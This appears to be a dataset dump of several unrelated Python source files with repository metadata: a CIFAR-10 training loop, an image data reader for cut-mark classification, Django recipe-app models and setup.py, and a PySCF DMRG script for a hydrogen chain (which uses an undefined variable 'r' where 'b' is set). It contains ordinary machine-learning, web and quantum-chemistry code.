testset = torchvision.datasets.CIFAR10(root='./data', train=False, download=True, transform=transform_test)
testloader = torch.utils.data.DataLoader(testset, batch_size=128, shuffle=False, num_workers=2)
classes = ('plane', 'car', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck')
# Model
print('==> Building model..')
#net = VGG('VGG19')
#net = ResNet18()
# net = PreActResNet18()
#net = GoogLeNet()
#net = DenseNet121()
#net = ResNet50()
#net = ResNeXt29_2x64d()
# net = MobileNet()
#net = MobileNetV2()
#net = DPN92()
# net = ShuffleNetG2()
#net = SENet18()
net = ResNet18()
net = net.to(device)
if device == 'cuda':
net = torch.nn.DataParallel(net)
cudnn.benchmark = True
if args.resume:
# Load checkpoint.
print('==> Resuming from checkpoint..')
assert os.path.isdir('checkpoint'), 'Error: no checkpoint directory found!'
checkpoint = torch.load('./checkpoint/ckpt.t7')
net.load_state_dict(checkpoint['net'])
best_acc = checkpoint['acc']
start_epoch = checkpoint['epoch']
criterion = nn.CrossEntropyLoss()
optimizer = optim.SGD(net.parameters(), lr=args.lr, momentum=0.9, weight_decay=5e-4)
scheduler = MultiStepLR(optimizer, milestones=[150,250], gamma=0.1)
# Training
def train(epoch):
scheduler.step()
print('\nEpoch: %d' % epoch)
net.train()
train_loss = 0
correct = 0
total = 0
for batch_idx, (inputs, targets) in enumerate(trainloader):
inputs, targets = inputs.to(device), targets.to(device)
optimizer.zero_grad()
outputs = net(inputs)
loss = criterion(outputs, targets)
loss.backward()
optimizer.step()
train_loss += loss.item()
_, predicted = outputs.max(1)
total += targets.size(0)
correct += predicted.eq(targets).sum().item()
progress_bar(batch_idx, len(trainloader), 'Loss: %.3f | Acc: %.3f%% (%d/%d)'
% (train_loss/(batch_idx+1), 100.*correct/total, correct, total))
def test(epoch):
global best_acc
net.eval()
test_loss = 0
correct = 0
total = 0
with torch.no_grad():
for batch_idx, (inputs, targets) in enumerate(testloader):
inputs, targets = inputs.to(device), targets.to(device)
outputs = net(inputs)
loss = criterion(outputs, targets)
test_loss += loss.item()
_, predicted = outputs.max(1)
total += targets.size(0)
correct += predicted.eq(targets).sum().item()
progress_bar(batch_idx, len(testloader), 'Loss: %.3f | Acc: %.3f%% (%d/%d)'
% (test_loss/(batch_idx+1), 100.*correct/total, correct, total))
# Save checkpoint.
acc = 100.*correct/total
if acc > best_acc:
print('Saving..')
state = {
'net': net.state_dict(),
'acc': acc,
'epoch': epoch,
}
if not os.path.isdir('checkpoint'):
os.mkdir('checkpoint')
torch.save(state, './checkpoint/ckpt7.t7')
best_acc = acc
for epoch in range(start_epoch, start_epoch+350):
train(epoch)
if epoch % 5 == 0:
test(epoch)
|
[
"tiangelce@gmail.com"
] |
tiangelce@gmail.com
|
e734127d3b880b7bdbc64335eccdd72f30d56e81
|
6b9ccdfb8a4d562f0b5122ef954ad76cb038b5d2
|
/CNN/data_reader.py
|
d10dd8cef8a86768a76ccc71ea5e05e652a68e31
|
[] |
no_license
|
yFiLES/cut-marks-classification
|
6d10e4a66c2b7302ef6eddffd2b635def9bfea82
|
6110647d38418cd07042a9f8533e9543a2f35f6e
|
refs/heads/master
| 2022-05-31T20:05:47.768543
| 2019-03-11T17:36:19
| 2019-03-11T17:36:19
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,581
|
py
|
#!/usr/bin/env python
# author: Wonmin Byeon (wonmin.byeon@gmail.com)
# data reader
import scipy.misc
import numpy as np
import glob
import random
import cv2
__author__ = "Wonmin Byeon"
__maintainer__ = "Wonmin Byeon"
__email__ = "wonmin.byeon@gmail.com"
np.random.seed(1234)
WORK_DIRECTORY = 'data/'
NUM_TEST_TM, NUM_TEST_RCM, NUM_TEST_CM = 10, 8, 2
IMAGE_SIZE_W, IMAGE_SIZE_H = 180, 520
def resize_image(image):
return scipy.misc.imresize(image, (IMAGE_SIZE_H, IMAGE_SIZE_W))
def resize_images(data, n_data):
resized_data = []
for idx in xrange(n_data):
image = data[idx]
resized_data.append(resize_image(image))
print("resized_data shape", np.array(resized_data).shape)
return resized_data
def apply_clahe(image):
clahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(8,8))
return clahe.apply(image).reshape(IMAGE_SIZE_H, IMAGE_SIZE_W, 1)
def apply_histogrameq(image):
processed = cv2.equalizeHist(image).reshape(IMAGE_SIZE_H, IMAGE_SIZE_W, 1)
return processed
def normalization(train_data, test_data):
print("before norm", np.mean(train_data), np.std(train_data), np.mean(test_data), np.std(test_data))
mean, std = np.mean(train_data), np.std(train_data)
train_data -= mean # zero-center
test_data -= mean
train_data /= std
test_data /= std
print("after norm", np.mean(train_data), np.std(train_data), np.mean(test_data), np.std(test_data))
return train_data, test_data
def reading_data():
# Get the data.
try:
flist_tm, flist_rcm, flist_cm = glob.glob(WORK_DIRECTORY+"tm/*.jpg"), glob.glob(WORK_DIRECTORY+"rcm/*.jpg"), glob.glob(WORK_DIRECTORY+"cm/*.jpg")
print('num files tm/rcm/cm: ',len(flist_tm), len(flist_rcm), len(flist_cm))
except:
print('Please set the correct path to the dataset: '+WORK_DIRECTORY+'*.jpg',)
sys.exit()
flist_tm, flist_rcm, flist_cm = shuffling(flist_tm), shuffling(flist_rcm), shuffling(flist_cm)
min_w, min_h = 99999, 99999
train_data, test_data, train_labels, test_labels, train_fname, test_fname = [], [], [], [], [], []
count = 0
for idx, fname in enumerate(flist_tm):
if ".jpg" in fname:
# image = misc.imread(fname)
image = scipy.misc.imread(fname)
hh, ww = image.shape
image = resize_image(image).reshape(IMAGE_SIZE_H, IMAGE_SIZE_W, 1)
processed1 = apply_histogrameq(image)
image = np.concatenate([image, processed1], axis=2)
if count < NUM_TEST_TM:
test_data.append(image/255.)
test_labels.append(0)
test_fname.append(fname)
count += 1
else:
train_data.append(image/255.)
train_labels.append(0)
train_fname.append(fname)
min_w, min_h = np.amin([min_w, ww]), np.amin([min_h, hh])
max_w, max_h = np.amax([min_w, ww]), np.amax([min_h, hh])
count=0
for idx, fname in enumerate(flist_rcm):
if ".jpg" in fname:
image = scipy.misc.imread(fname)
hh, ww = image.shape
image = resize_image(image).reshape(IMAGE_SIZE_H, IMAGE_SIZE_W, 1)
processed1 = apply_histogrameq(image)
# processed2 = apply_clahe(image)
image = np.concatenate([image, processed1], axis=2)
if count < NUM_TEST_RCM:
test_data.append(image/255.)
test_labels.append(1)
test_fname.append(fname)
count += 1
else:
train_data.append(image/255.)
train_labels.append(1)
train_fname.append(fname)
min_w, min_h = np.amin([min_w, ww]), np.amin([min_h, hh])
max_w, max_h = np.amax([min_w, ww]), np.amax([min_h, hh])
count=0
for idx, fname in enumerate(flist_cm):
if ".jpg" in fname:
image = scipy.misc.imread(fname)
hh, ww = image.shape
image = resize_image(image).reshape(IMAGE_SIZE_H, IMAGE_SIZE_W, 1)
processed1 = apply_histogrameq(image)
# processed2 = apply_clahe(image)
image = np.concatenate([image, processed1], axis=2)
if count < NUM_TEST_CM:
test_data.append(image/255.)
test_labels.append(1)
test_fname.append(fname)
count += 1
else:
train_data.append(image/255.)
train_labels.append(1)
train_fname.append(fname)
min_w, min_h = np.amin([min_w, ww]), np.amin([min_h, hh])
max_w, max_h = np.amax([min_w, ww]), np.amax([min_h, hh])
train_data, train_labels, train_fname = shuffling_dataset(train_data, train_labels, train_fname)
test_data, test_labels, test_fname = shuffling_dataset(test_data, test_labels, test_fname)
train_data, test_data = np.float32(train_data), np.float32(test_data)
train_labels, test_labels = np.int64(train_labels), np.int64(test_labels)
return train_data, test_data, train_labels, test_labels, train_fname, test_fname, min_h, min_w
def reading_test_data(directory):
# Get the data.
try:
flist_tm, flist_cm = glob.glob(directory+"tm/*.jpg"), glob.glob(directory+"cm/*.jpg")
except:
print('Please set the correct path to the dataset: '+directory+'*.jpg',)
sys.exit()
flist_tm, flist_cm = shuffling(flist_tm), shuffling(flist_cm)
test_labels, test_data, test_fname = [], [], []
count = 0
for idx, fname in enumerate(flist_tm):
if ".jpg" in fname:
image = scipy.misc.imread(fname)
hh, ww = image.shape
image = resize_image(image).reshape(IMAGE_SIZE_H, IMAGE_SIZE_W, 1)
processed1 = apply_histogrameq(image)
image = np.concatenate([image, processed1], axis=2)
test_data.append(image/255.)
test_labels.append(0)
test_fname.append(fname)
count += 1
count=0
for idx, fname in enumerate(flist_cm):
if ".jpg" in fname:
image = scipy.misc.imread(fname)
hh, ww = image.shape
image = resize_image(image).reshape(IMAGE_SIZE_H, IMAGE_SIZE_W, 1)
processed1 = apply_histogrameq(image)
image = np.concatenate([image, processed1], axis=2)
test_data.append(image/255.)
test_labels.append(1)
test_fname.append(fname)
count += 1
test_data, test_labels, test_fname = shuffling_dataset(test_data, test_labels, test_fname)
test_data = np.float32(test_data)
test_labels = np.int64(test_labels)
return test_data, test_labels, test_fname
def shuffling(data):
perm = np.arange(len(data))
np.random.shuffle(perm)
data = np.array(data)
return data[perm]
def shuffling_dataset(data, labels, fname):
perm = np.arange(len(data))
np.random.shuffle(perm)
data = np.array(data)
labels = np.array(labels)
fname = np.array(fname)
return data[perm], labels[perm], fname[perm]
|
[
"wonmin.byeon@gmail.com"
] |
wonmin.byeon@gmail.com
|
c379e124c4ff17be1f63b28b14af4a7ae7cddbc6
|
42756a590390ea219b828a0d504b19705a22cd99
|
/app/core/models.py
|
e2247dc93d6c43a4132d8f4c435d0a6aee531868
|
[
"MIT"
] |
permissive
|
namjo/recipe-app-api
|
d68fecec91f8f1cab3b8c14da5663e438eb49888
|
0eb8f1f51e8bc3cf010dd36e55a861ddd1b4cb23
|
refs/heads/master
| 2022-04-26T06:17:45.195474
| 2020-04-24T19:11:40
| 2020-04-24T19:11:40
| 256,265,354
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,600
|
py
|
import uuid
import os
from django.db import models
from django.contrib.auth.models import AbstractBaseUser, BaseUserManager, \
PermissionsMixin
from django.conf import settings
def recipe_image_file_path(instance, filename):
"""Generate file path for new recipe image"""
ext = filename.split('.')[-1]
filename = f'{uuid.uuid4()}.{ext}'
return os.path.join('uploads/recipe/', filename)
class UserManager(BaseUserManager):
def create_user(self, email, password, **extra_fields):
"""Creates and saves a new user"""
if not email:
raise ValueError('Users must have an email address')
user = self.model(email=self.normalize_email(email), **extra_fields)
user.set_password(password)
user.save(using=self._db)
return user
def create_superuser(self, email, password):
"""Creates and saves a new superuser"""
user = self.create_user(email, password)
user.is_staff = True
user.is_superuser = True
user.save(using=self._db)
return user
class User(AbstractBaseUser, PermissionsMixin):
"""Custom user model that supports using email instead of username"""
email = models.EmailField(max_length=255, unique=True)
name = models.CharField(max_length=255)
is_active = models.BooleanField(default=True)
is_staff = models.BooleanField(default=False)
objects = UserManager()
USERNAME_FIELD = 'email'
class Tag(models.Model):
"""Tag to be used for a recipe"""
name = models.CharField(max_length=255)
user = models.ForeignKey(
settings.AUTH_USER_MODEL,
on_delete=models.CASCADE
)
def __str__(self):
return self.name
class Ingredient(models.Model):
"""Ingredient for a recipe"""
name = models.CharField(max_length=255)
user = models.ForeignKey(
settings.AUTH_USER_MODEL,
on_delete=models.CASCADE
)
def __str__(self):
return self.name
class Recipe(models.Model):
"""Recipe object"""
user = models.ForeignKey(
settings.AUTH_USER_MODEL,
on_delete=models.CASCADE
)
title = models.CharField(max_length=255)
time_minutes = models.IntegerField()
price = models.DecimalField(max_digits=5, decimal_places=2)
link = models.CharField(max_length=255, blank=True)
ingredients = models.ManyToManyField('Ingredient')
tags = models.ManyToManyField('Tag')
image = models.ImageField(null=True, upload_to=recipe_image_file_path)
def __str__(self):
return self.title
|
[
"nam.johannes@gmail.com"
] |
nam.johannes@gmail.com
|
33f1b6e48e0c04a001cd1121b0aba0c6b0d1546a
|
6d5510693f65f079e7ff672e064a81e4ff74ca2d
|
/H10_DMRG_curve.py
|
9c3ee350183b1caa05e84df94a967fbdbf364fad
|
[] |
no_license
|
gkc1000/SimonsExercises
|
3612a1f78506ec86e97f30fdd04f197ecc4a6c0b
|
0d4a7d9e4f29b0cd3594ae60957e8304693e8db8
|
refs/heads/master
| 2021-01-20T18:28:32.328247
| 2016-06-23T20:00:11
| 2016-06-23T20:00:11
| 61,827,692
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,050
|
py
|
#!/usr/bin/env python
#
# Author: Qiming Sun <osirpt.sun@gmail.com>
#
from pyscf import gto
from pyscf import scf
from pyscf import mcscf
from pyscf import dmrgscf
import os
from pyscf.dmrgscf import settings
'''
Use DMRG program as the solver
The DMRG program is invoked through system call.
'''
b = 0.7
mol = gto.M( verbose = 4,
atom = [['H', (0, 0, 0)],
['H', (r, 0, 0)],
['H', (2*r, 0, 0)],
['H', (3*r, 0, 0)],
['H', (4*r, 0, 0)],
['H', (5*r, 0, 0)],
['H', (6*r, 0, 0)],
['H', (7*r, 0, 0)],
['H', (8*r, 0, 0)],
['H', (9*r, 0, 0)]],
basis = 'sto-3g',
)
mf = scf.RHF(mol)
mf.kernel()
mc = dmrgscf.dmrgci.DMRGCI(mf, 8, 8)
mc.mo_coeff = mf.mo_coeff # sets orbitals with which to do DMRG calculation (just HF MO here)
emc = mc.kernel()[0]
print(emc)
|
[
"gkc1000@gmail.com"
] |
gkc1000@gmail.com
|
214b3e555a47cc401125457c25dc90a26b14ef9c
|
cacc55e5a17ef2a8aee476235009f679fe959c30
|
/setup.py
|
fa4f10f172c0e2da2c2bdb697870a24fe31fdb8c
|
[] |
no_license
|
takers/Django-polls-vote-
|
b1379df8129de138987576d61fb73c0b1b186bea
|
aa12789c1960b40fb0af1d51a835057500ee2d5c
|
refs/heads/master
| 2020-03-29T14:33:45.240048
| 2014-01-02T06:20:28
| 2014-01-02T06:20:28
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,083
|
py
|
import os
from setuptools import setup
README = open(os.path.join(os.path.dirname(__file__), 'README.rst')).read()
# allow setup.py to be run from any path
os.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))
setup(
name='django-polls',
version='0.1',
packages=['polls'],
include_package_data=True,
license='BSD License', # example license
description='A simple Django app to conduct Web-based polls.',
long_description=README,
url='http://www..com/',
author='Gabriel Nweke',
author_email='gab4real2013@gmail.com',
classifiers=[
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License', # example license
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
],
)
|
[
"gab4real2013@gmail.com"
] |
gab4real2013@gmail.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.